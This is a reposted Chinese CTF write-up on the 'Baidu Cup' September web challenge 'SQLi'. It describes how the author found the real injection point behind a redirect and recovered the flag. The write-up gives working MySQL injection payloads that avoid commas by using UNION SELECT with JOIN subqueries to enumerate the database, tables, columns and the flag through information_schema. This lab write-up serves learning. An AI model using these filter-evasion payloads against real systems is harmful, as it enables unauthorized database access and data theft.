我是靠谱客的博主 花痴高跟鞋,最近开发中收集的这篇文章主要介绍“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

今天在i春秋做题的时候遇到了一道非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。
题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791
访问地址,发现什么都没有,
这里写图片描述
查看页面源代码,发现提示
这里写图片描述
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/login.php?id=1
得到下面页面
这里写图片描述
我去,不会这就注入进去了吧?!话不多说,上sqlmap,
这里写图片描述
尝试了好多次,发现这就是个假的注入点,果然没那么简单啊,,,,
设置代理,利用工具Burp Suite看看究竟发生了什么,,,
可以看到在访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com的时候,302,页面重定向了。
注意看,下面两个图片
这里写图片描述
这里写图片描述
在302重定向回复报文中,url已经改变,原来箭头那里是3l,被重定向到31,6不6,哈哈。并且看到了新的页面地址l0gin.php?id=1
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/l0gin.php?id=1
得到下图
这里写图片描述
修改参数,再次执行,
这里写图片描述
OK,看来这个确实是一个注入点,再用sqlmap测试,从结果可以看到这既是一个基于布尔的盲注,也是一个基于时间的盲注
这里写图片描述
接着爆数据库,发现无法得到,没办法,只能手工注入了,
这里我选择基于布尔的盲注,因为这样的回显比基于时间的看起来明显。
输入参数
1' and ascii(substr((select database()),1,1))>64 %23
查询数据库名,发现,注入失败,并且,后面的sql语句被过滤掉了,id字段输出的应该就是过滤后的sql语句了
这里写图片描述
从网上看到一篇讲不需要逗号的mysql注入文章,http://wonderkun.cc/index.html/?p=442
于是重新构造payload,如id=-1' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23
可以看到数据库名称为sqli
这里写图片描述
紧接着,构造payload,获取表名
-1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23
这里写图片描述
构造payload,获取字段名
-1' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select version() ) b %23
这里写图片描述
构造payload,获取字段值,得到flag{34303304-de0b-4bad-a0df-84eb8a420df8}
-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23
这里写图片描述

最后

以上就是花痴高跟鞋为你收集整理的“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧的全部内容,希望文章能够帮你解决“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(41)

评论列表共有 0 条评论

立即
投稿
返回
顶部